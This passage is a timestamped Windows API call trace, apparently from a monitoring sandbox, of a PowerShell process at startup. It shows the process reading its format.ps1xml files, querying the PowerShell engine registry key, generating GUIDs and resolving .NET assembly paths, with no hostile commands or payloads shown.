	[0161.291] ReadFile (in: hFile=0x1cc, lpBuffer=0x3459ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x3459ff8*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0161.698] ReadFile (in: hFile=0x1cc, lpBuffer=0x3459ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x3459ff8*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0161.932] ReadFile (in: hFile=0x1cc, lpBuffer=0x3459ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x3459ff8*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0162.354] ReadFile (in: hFile=0x1cc, lpBuffer=0x3459ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x3459ff8*, lpNumberOfBytesRead=0x27cf18*=0xfb2, lpOverlapped=0x0) returned 1
	[0162.866] ReadFile (in: hFile=0x1cc, lpBuffer=0x3459712, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x3459712*, lpNumberOfBytesRead=0x27cf18*=0x0, lpOverlapped=0x0) returned 1
	[0163.381] ReadFile (in: hFile=0x1cc, lpBuffer=0x3459ff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x3459ff8*, lpNumberOfBytesRead=0x27cf18*=0x0, lpOverlapped=0x0) returned 1
	[0163.661] CloseHandle (hObject=0x1cc) returned 1
	[0166.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0166.235] SetErrorMode (uMode=0x1) returned 0x1
	[0166.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27cec0 | out: lpFileInformation=0x27cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0167.639] SetErrorMode (uMode=0x1) returned 0x1
	[0167.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0167.640] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x27cfa8 | out: phkResult=0x27cfa8*=0x1cc) returned 0x0
	[0167.640] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27cf2c, lpData=0x0, lpcbData=0x27cf28*=0x0 | out: lpType=0x27cf2c*=0x1, lpData=0x0, lpcbData=0x27cf28*=0x56) returned 0x0
	[0167.640] CoTaskMemAlloc (cb=0x5a) returned 0x19beb0
	[0167.640] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27cefc, lpData=0x19beb0, lpcbData=0x27cef8*=0x56 | out: lpType=0x27cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27cef8*=0x56) returned 0x0
	[0167.640] CoTaskMemFree (pv=0x19beb0) 
	[0167.640] RegCloseKey (hKey=0x1cc) returned 0x0
	[0167.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0167.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0167.643] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0x86ec387d, Data2=0xb699, Data3=0x420d, Data4=([0]=0x8d, [1]=0xa8, [2]=0xa0, [3]=0x36, [4]=0x10, [5]=0xf1, [6]=0xf7, [7]=0x98))) returned 0x0
	[0167.647] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0xda246497, Data2=0x195c, Data3=0x4c99, Data4=([0]=0xbf, [1]=0xf3, [2]=0xb2, [3]=0xde, [4]=0xff, [5]=0xbc, [6]=0x1c, [7]=0xed))) returned 0x0
	[0167.648] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0x36148879, Data2=0x95ea, Data3=0x40de, Data4=([0]=0xb1, [1]=0x5c, [2]=0xca, [3]=0x18, [4]=0x76, [5]=0x8f, [6]=0xa1, [7]=0x86))) returned 0x0
	[0167.649] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0x640c3290, Data2=0x4d90, Data3=0x4f7f, Data4=([0]=0xb4, [1]=0xdb, [2]=0x6b, [3]=0xea, [4]=0x66, [5]=0x61, [6]=0x84, [7]=0x13))) returned 0x0
	[0167.650] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0xe1505d2c, Data2=0x9cb6, Data3=0x4422, Data4=([0]=0x8b, [1]=0xa4, [2]=0x3d, [3]=0xe8, [4]=0x77, [5]=0x40, [6]=0x34, [7]=0x5f))) returned 0x0
	[0167.650] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0x5795133e, Data2=0x74fb, Data3=0x4b82, Data4=([0]=0xaf, [1]=0x54, [2]=0xf9, [3]=0x12, [4]=0xef, [5]=0xc1, [6]=0x73, [7]=0x22))) returned 0x0
	[0167.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.651] SetErrorMode (uMode=0x1) returned 0x1
	[0167.651] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1cc
	[0167.651] GetFileType (hFile=0x1cc) returned 0x1
	[0167.651] SetErrorMode (uMode=0x1) returned 0x1
	[0167.651] GetFileType (hFile=0x1cc) returned 0x1
	[0167.651] ReadFile (in: hFile=0x1cc, lpBuffer=0x34a5d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x34a5d58*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0167.652] ReadFile (in: hFile=0x1cc, lpBuffer=0x34a5d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x34a5d58*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0167.653] ReadFile (in: hFile=0x1cc, lpBuffer=0x34a5d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x34a5d58*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0167.653] ReadFile (in: hFile=0x1cc, lpBuffer=0x34a5d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x34a5d58*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0167.654] ReadFile (in: hFile=0x1cc, lpBuffer=0x34a5d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x34a5d58*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0167.654] ReadFile (in: hFile=0x1cc, lpBuffer=0x34a5d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x34a5d58*, lpNumberOfBytesRead=0x27cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0167.654] ReadFile (in: hFile=0x1cc, lpBuffer=0x34a5d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x34a5d58*, lpNumberOfBytesRead=0x27cf18*=0xaca, lpOverlapped=0x0) returned 1
	[0167.654] ReadFile (in: hFile=0x1cc, lpBuffer=0x34a538a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x34a538a*, lpNumberOfBytesRead=0x27cf18*=0x0, lpOverlapped=0x0) returned 1
	[0167.655] ReadFile (in: hFile=0x1cc, lpBuffer=0x34a5d58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf18, lpOverlapped=0x0 | out: lpBuffer=0x34a5d58*, lpNumberOfBytesRead=0x27cf18*=0x0, lpOverlapped=0x0) returned 1
	[0167.655] CloseHandle (hObject=0x1cc) returned 1
	[0167.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.655] SetErrorMode (uMode=0x1) returned 0x1
	[0167.655] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27cec0 | out: lpFileInformation=0x27cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0167.655] SetErrorMode (uMode=0x1) returned 0x1
	[0167.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.655] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x27cfa8 | out: phkResult=0x27cfa8*=0x1cc) returned 0x0
	[0167.655] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27cf2c, lpData=0x0, lpcbData=0x27cf28*=0x0 | out: lpType=0x27cf2c*=0x1, lpData=0x0, lpcbData=0x27cf28*=0x56) returned 0x0
	[0167.655] CoTaskMemAlloc (cb=0x5a) returned 0x19beb0
	[0167.655] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27cefc, lpData=0x19beb0, lpcbData=0x27cef8*=0x56 | out: lpType=0x27cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27cef8*=0x56) returned 0x0
	[0167.655] CoTaskMemFree (pv=0x19beb0) 
	[0167.656] RegCloseKey (hKey=0x1cc) returned 0x0
	[0167.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0167.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0167.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0167.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0168.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0168.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0169.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0169.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0169.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0169.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0169.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0169.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0169.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.325] VirtualQuery (in: lpAddress=0x27ba40, lpBuffer=0x27c900, dwLength=0x30 | out: lpBuffer=0x27c900*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.326] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0xba27ffe9, Data2=0xeacf, Data3=0x499a, Data4=([0]=0x86, [1]=0xc, [2]=0xae, [3]=0x80, [4]=0xd6, [5]=0x4d, [6]=0x1f, [7]=0x34))) returned 0x0
	[0176.327] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0x6c3f4c03, Data2=0x731e, Data3=0x4d2b, Data4=([0]=0xaf, [1]=0xf, [2]=0x16, [3]=0xdb, [4]=0x29, [5]=0x57, [6]=0x2b, [7]=0xbd))) returned 0x0
	[0176.328] VirtualQuery (in: lpAddress=0x27bbf0, lpBuffer=0x27cab0, dwLength=0x30 | out: lpBuffer=0x27cab0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.329] VirtualQuery (in: lpAddress=0x27bbf0, lpBuffer=0x27cab0, dwLength=0x30 | out: lpBuffer=0x27cab0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.330] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0xeb8f8fe8, Data2=0xa0c3, Data3=0x4de2, Data4=([0]=0xaf, [1]=0x89, [2]=0xc0, [3]=0xad, [4]=0x36, [5]=0x5, [6]=0x94, [7]=0xf1))) returned 0x0
	[0176.333] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0xe323ac5e, Data2=0x4d14, Data3=0x4821, Data4=([0]=0xa0, [1]=0xde, [2]=0xff, [3]=0x88, [4]=0x69, [5]=0x2c, [6]=0xba, [7]=0x6e))) returned 0x0
	[0176.333] VirtualQuery (in: lpAddress=0x27be40, lpBuffer=0x27cd00, dwLength=0x30 | out: lpBuffer=0x27cd00*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.337] VirtualQuery (in: lpAddress=0x27b4b0, lpBuffer=0x27c370, dwLength=0x30 | out: lpBuffer=0x27c370*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.999] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0xa43f98b3, Data2=0x1bea, Data3=0x4ba7, Data4=([0]=0x83, [1]=0xa1, [2]=0xbc, [3]=0xbe, [4]=0x60, [5]=0x58, [6]=0x70, [7]=0xc8))) returned 0x0
	[0177.000] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0x4c16f717, Data2=0x3f0c, Data3=0x448b, Data4=([0]=0x97, [1]=0x9e, [2]=0x33, [3]=0xd2, [4]=0x94, [5]=0x6d, [6]=0xad, [7]=0xa4))) returned 0x0
	[0177.000] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0xaf6d071f, Data2=0xe2f2, Data3=0x4586, Data4=([0]=0x89, [1]=0xdd, [2]=0x63, [3]=0xd4, [4]=0xb6, [5]=0x6a, [6]=0xb3, [7]=0x50))) returned 0x0
	[0177.001] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0xc09b5a13, Data2=0x8de6, Data3=0x4f28, Data4=([0]=0x96, [1]=0x5e, [2]=0x18, [3]=0x26, [4]=0x9c, [5]=0x1b, [6]=0xf3, [7]=0x4d))) returned 0x0
	[0177.001] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0xb0434ec5, Data2=0x2fa2, Data3=0x48f3, Data4=([0]=0x8f, [1]=0x8a, [2]=0x45, [3]=0xf2, [4]=0xdf, [5]=0xe, [6]=0x2a, [7]=0x78))) returned 0x0
	[0177.001] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0x28cd471a, Data2=0x7393, Data3=0x4303, Data4=([0]=0x90, [1]=0x2f, [2]=0xe, [3]=0x16, [4]=0x6d, [5]=0x97, [6]=0x1c, [7]=0xb6))) returned 0x0
	[0177.002] VirtualQuery (in: lpAddress=0x27bb80, lpBuffer=0x27ca40, dwLength=0x30 | out: lpBuffer=0x27ca40*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0177.003] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0x876b7fbb, Data2=0x7437, Data3=0x4129, Data4=([0]=0xa3, [1]=0x22, [2]=0x9e, [3]=0xa3, [4]=0xe8, [5]=0xbe, [6]=0xa1, [7]=0xf4))) returned 0x0
	[0177.003] VirtualQuery (in: lpAddress=0x27bb80, lpBuffer=0x27ca40, dwLength=0x30 | out: lpBuffer=0x27ca40*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0177.004] VirtualQuery (in: lpAddress=0x27bb80, lpBuffer=0x27ca40, dwLength=0x30 | out: lpBuffer=0x27ca40*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
